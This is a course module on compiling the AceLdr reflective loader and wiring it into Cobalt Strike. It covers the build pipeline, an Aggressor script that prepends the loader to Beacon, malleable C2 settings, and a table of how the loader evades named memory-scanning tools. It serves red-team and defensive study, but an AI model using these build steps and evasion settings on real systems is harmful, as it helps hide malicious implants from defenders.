Module 9: Full Chain & Cobalt Strike Integration

From Makefile to malleable C2 — shipping AceLdr as a production RDLL

Advanced

Build Pipeline

AceLdr's build system uses a Makefile that chains three tools: NASM (assembler), GCC (cross-compiler targeting x86-64 Windows), and a custom extract.py script:

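Build pipeline (diagram):

  1. *.asm files (spoof.asm, etc.) are assembled to .o objects by NASM.
  2. *.c files (ace.c, util.c, hooks/) are compiled and linked with those objects by x86_64-w64-mingw32-gcc, producing ace.exe (raw PE).
  3. extract.py extracts .text from ace.exe, producing ace.bin (PIC shellcode).
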
Makefile
# Assemble the return-address spoofing stub
nasm -f win64 spoof.asm -o spoof.o

# Compile and link everything as position-independent code
x86_64-w64-mingw32-gcc \
    -nostdlib -fPIC -Os \
    -ffunction-sections -fdata-sections \
    -Wl,--no-seh,--image-base=0,-s,--gc-sections \
    -o ace.exe \
    ace.c util.c hooks/*.c spoof.o

# Extract the .text section as raw shellcode
python3 extract.py ace.exe ace.bin

Compiler Flags Explained

Flag | Purpose
-nostdlib | Do not link against the C standard library. AceLdr resolves all APIs at runtime via PEB walking and API hashing, so it has no CRT dependency.
-fPIC | Request position-independent code. x86-64 code addresses data RIP-relatively, so the result runs at any load address as long as it contains no absolute addresses that would need relocation.
-Os | Optimize for size. Smaller shellcode means less data to inject and a smaller memory footprint.
-ffunction-sections, -fdata-sections | Place each function and each data item in its own section. Combined with --gc-sections, the linker can discard unused ones.
-Wl,--gc-sections | Tell the linker to drop sections that nothing references.
-Wl,--no-seh | Mark the image as not using Structured Exception Handling (sets the NO_SEH flag in the PE header's DllCharacteristics). The shellcode registers no SE handlers, and exception metadata outside .text would not survive extraction anyway.
-Wl,--image-base=0 | Set the preferred load address to 0, so any address the linker resolves is an offset from the start of the image rather than a fixed virtual address.
-Wl,-s | Strip all symbols and debug information. Reduces size and removes reverse-engineering hints.

extract.py

The final step uses a Python script to parse the compiled PE and extract just the .text section as raw bytes. This is the actual shellcode (ace.bin) that gets injected into a target process. The PE headers, import table, and other sections are discarded — they were only needed for linking.
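
To make the extraction step concrete, here is a minimal sketch of pulling one section's raw bytes out of a PE file with only the Python standard library. It is not AceLdr's actual extract.py; the function name `extract_section` and its behavior (return the first section whose name matches, trimmed to its virtual size) are assumptions made for illustration. The header offsets come from the PE/COFF format itself.

```python
import struct


def extract_section(pe_bytes: bytes, wanted: bytes = b".text") -> bytes:
    """Return the raw bytes of the first section named `wanted`.

    Hypothetical helper for illustration; not taken from AceLdr.
    """
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")

    # e_lfanew (offset 0x3C in the DOS header) points at the PE signature.
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")

    # The 20-byte COFF header follows the 4-byte signature.
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe_bytes, coff + 2)
    (opt_header_size,) = struct.unpack_from("<H", pe_bytes, coff + 16)

    # The section table starts right after the optional header.
    table = coff + 20 + opt_header_size
    for i in range(num_sections):
        off = table + i * 40  # each section header is 40 bytes
        name = pe_bytes[off:off + 8].rstrip(b"\0")
        virtual_size, _rva, raw_size, raw_ptr = struct.unpack_from(
            "<IIII", pe_bytes, off + 8
        )
        if name == wanted:
            # SizeOfRawData is padded to the file alignment, so trim the
            # result to VirtualSize when that field is populated.
            size = min(virtual_size, raw_size) if virtual_size else raw_size
            return pe_bytes[raw_ptr:raw_ptr + size]

    raise ValueError("section not found: " + wanted.decode(errors="replace"))
```

Under these assumptions, reading ace.exe into memory, passing it to `extract_section`, and writing the result to ace.bin would reproduce the last stage of the pipeline. Trimming to the virtual size keeps alignment padding out of the output, which matters when something else is appended directly after the blob.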

Cobalt Strike CNA Script

AceLdr integrates with Cobalt Strike as a Reflective DLL (RDLL) replacement via an Aggressor script (.cna file). The key hook is BEACON_RDLL_GENERATE:

Aggressor Script — aceldr.cna
# Hook into Cobalt Strike's RDLL generation
set BEACON_RDLL_GENERATE {
    # $1 = Beacon payload file name
    # $2 = raw Beacon DLL bytes
    # $3 = architecture (x86 or x64)

    # Only x64 is supported
    if ($3 eq "x64") {
        # Read the AceLdr shellcode from disk
        $handle = openf(script_resource("ace.bin"));
        $loader = readb($handle, -1);
        closef($handle);

        # Concatenate: AceLdr shellcode + Beacon DLL.
        # AceLdr expects the Beacon immediately after itself and
        # finds it by looking for the ACELDR marker at a known
        # offset from its own base address.
        return $loader . $2;
    }

    # Return $null so Cobalt Strike keeps its default loader for x86
    return $null;
}

How Concatenation Works

RDLL memory layout (diagram): ace.bin (AceLdr PIC shellcode) + beacon.dll (raw Cobalt Strike DLL) = combined RDLL (injected into target)

The BEACON_RDLL_GENERATE hook replaces Cobalt Strike's default reflective loader with AceLdr. The concatenation ($loader . $2) places the AceLdr shellcode immediately before the raw beacon DLL bytes. When injected, execution starts at AceLdr's entry point, which:

  1. Locates the beacon DLL appended after itself using a known marker
  2. Reflectively loads the beacon into memory
  3. Installs the 6 IAT hooks
  4. Calls the beacon's DllMain to start execution

The ACELDR Marker

AceLdr embeds a marker (a magic byte sequence) at a known offset in its shellcode. After injection, it uses this marker to calculate where its own code ends and where the appended beacon DLL begins. This avoids hardcoding sizes — the same AceLdr binary works with any beacon DLL regardless of its size.
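
The size-independence argument can be illustrated with a few lines of Python that model the layout as plain byte strings. This is a sketch under stated assumptions, not AceLdr's code: the marker value `b"ACELDR"` is a placeholder (the real byte sequence is defined in AceLdr's source), the marker is assumed to be the last thing in the loader blob, and `build_blob` and `split_blob` are hypothetical helper names.

```python
from typing import Tuple

# Placeholder marker value, assumed for illustration only.
MARKER = b"ACELDR"


def build_blob(loader_code: bytes, payload: bytes) -> bytes:
    """Model `$loader . $2`: loader bytes ending in the marker, then the payload."""
    return loader_code + MARKER + payload


def split_blob(blob: bytes) -> Tuple[bytes, bytes]:
    """Return (loader, payload) by locating the first occurrence of the marker."""
    pos = blob.find(MARKER)
    if pos < 0:
        raise ValueError("marker not found")
    end_of_loader = pos + len(MARKER)
    return blob[:end_of_loader], blob[end_of_loader:]
```

Because the split point is derived from the marker position rather than a stored length, the same loader bytes work unchanged whether the appended payload is a few kilobytes or several hundred.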

Complete Lifecycle — 4 Phases

AceLdr + Beacon Lifecycle

Phase 1: Injection

  1. The operator sends the beacon payload.
  2. The injector writes AceLdr + beacon into the target.
  3. Execution starts at AceLdr's entry point.

Phase 2: Reflective Load

  1. Find the beacon via the ACELDR marker.
  2. Map sections and fix relocations.
  3. Resolve imports via PEB walking.
  4. Install the 6 IAT hooks.
  5. Call the beacon's DllMain.

Phase 3: Running

  • The beacon executes operator commands.
  • Heap allocations live on a private heap, away from the default process heap.
  • API calls use spoofed return addresses.
  • C2 communications go through InternetConnectA.

Phase 4: Sleeping

  1. The beacon calls Sleep(interval).
  2. FOLIAGE encrypts the heap.
  3. The APC chain masks the code and spoofs the thread context.
  4. The thread sleeps, fully masked.
  5. On wakeup, everything is decrypted and restored.

Malleable C2 Profile Highlights

For optimal operation with AceLdr, the Cobalt Strike malleable C2 profile should include specific settings:

Key Profile Settings

Malleable C2 Profile
# Use RDLL for reflective loading
stage {
    set userwx        "false";     # Don't use RWX memory
    set stomppe       "true";      # Stomp PE headers after load
    set cleanup       "true";      # Clean up loader artifacts
    set sleep_mask    "false";     # Disable CS sleep mask (AceLdr handles this)
    set smartinject   "true";      # Use smart injection techniques
}

# Process injection settings
process-inject {
    set startrwx "false";          # Don't start with RWX
    set userwx   "false";          # Don't use RWX after injection
}

The critical setting is set sleep_mask "false". Cobalt Strike has its own built-in sleep mask, but AceLdr's FOLIAGE implementation is more comprehensive (it includes heap encryption, context spoofing, and CFG-aware APC chains). Using both simultaneously would conflict.

References & Further Reading

Primary Sources

Resource | Description
AceLdr Repository | The original AceLdr source code: a Cobalt Strike RDLL with position-independent reflective loading, IAT hooking, return address spoofing, and FOLIAGE-based sleep masking
FOLIAGE by SecIdiot | The inspiration for AceLdr's sleep masking; demonstrates APC-based sleep encryption with thread context spoofing
TitanLdr | Another advanced reflective DLL loader with similar techniques; useful for comparing implementation approaches
Return Address Spoofing | Research and proof-of-concept code for spoofing call stack return addresses using ROP-like gadgets

Detection Tools to Study

Understanding detection is as important as understanding evasion. Study these tools to understand what defenders look for:

Tool | What It Detects | How AceLdr Evades It
Moneta | Unbacked executable memory, suspicious memory permissions | FOLIAGE changes permissions to RW during sleep; code is encrypted
PE-sieve | Hollowed processes, injected PEs, modified modules | AceLdr stomps PE headers and uses a private heap to avoid default heap artifacts
BeaconEye | Cobalt Strike beacon configuration blocks in memory | Private heap + FOLIAGE encryption masks config data during sleep
Hunt-Sleeping-Beacons | Threads sleeping with suspicious return addresses or contexts | Return address spoofing + thread context spoofing via FOLIAGE APCs
Patriot | Sleeping threads with RIP pointing to non-module memory | FOLIAGE APC chain sets RIP to an address inside ntdll during sleep

Final Knowledge Check

Module 9 Quiz

1. How does AceLdr locate the appended beacon DLL in memory after injection?

AceLdr embeds a magic marker (the ACELDR marker) at a known offset in its shellcode. After injection, it locates this marker to calculate where its own code ends and where the concatenated beacon DLL begins. This avoids hardcoding sizes and works with any beacon DLL.

2. In the CNA script, what does the concatenation $loader . $2 produce?

$loader is the AceLdr shellcode (read from ace.bin) and $2 is the raw beacon DLL bytes provided by Cobalt Strike. The dot operator concatenates them, producing a binary blob where AceLdr shellcode comes first (its entry point is at offset 0), immediately followed by the beacon DLL that AceLdr will reflectively load.

3. Which of the following is NOT true about the beacon during a FOLIAGE-masked sleep?

The false statement is that the IAT hooks are removed during sleep. They are installed once after reflective loading and persist for the entire beacon lifecycle. During a FOLIAGE sleep, the beacon's code is encrypted, the heap is encrypted, memory permissions change to RW, and the thread context is spoofed, but the IAT entries themselves remain modified.

4. In the FOLIAGE APC chain, what is the correct ordering of the key operations?

The correct order follows the APC chain: (1) Get context, (2) Spoof context (set RIP to ntdll), (3) Change permissions to RW, (4) Encrypt beacon code, (5) Sleep (the actual wait), (6) Decrypt beacon code, (7) Change permissions back to RX, (8) Restore original context, (9) Signal completion. The operations mirror each other around the sleep in the middle.

Course Complete!

You've completed all 9 modules of the AceLdr Memory Evasion Masterclass.

What You've Learned
  • Windows memory fundamentals and virtual memory
  • PE file format parsing and manipulation
  • PEB walking and API hashing for stealth
  • Reflective DLL loading without LoadLibrary
  • Position-independent code (PIC) development
  • IAT hooking for behavioral control
  • Return address spoofing with ROP gadgets
  • FOLIAGE sleep masking with APC chains
  • Full build pipeline and Cobalt Strike integration

Recommended Next Steps
  • Read AceLdr's full source code end-to-end
  • Build a minimal loader from scratch
  • Study indirect syscalls and ETW bypasses
  • Test with detection tools (Moneta, PE-sieve)
  • Explore hardware breakpoint hooking
  • Read the FOLIAGE and TitanLdr source code
  • Practice analyzing beacons with BeaconEye

Understanding these techniques is essential for both offensive security professionals and defenders building detection capabilities.